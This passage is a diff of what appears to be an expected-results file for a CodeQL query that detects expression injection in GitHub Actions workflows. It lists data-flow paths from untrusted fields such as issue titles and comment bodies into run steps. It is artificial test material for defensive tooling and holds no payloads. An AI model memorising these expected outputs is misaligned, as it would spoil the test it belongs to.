.github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | +| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | -| .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | -| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | -| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | semmle.label | env.pr_message | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | semmle.label | Job outputs node [matrix] | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | semmle.label | Uses Step: set-matrix | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | -| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | semmle.label | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | semmle.label | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | semmle.label | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | semmle.label | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | semmle.label | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | semmle.label | github.event.head_commit.author.name | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | semmle.label | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | semmle.label | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | semmle.label | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | semmle.label | github.event.commits[11].committer.name | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | -| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | semmle.label | github.event.workflow_run.head_commit.committer.email | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | 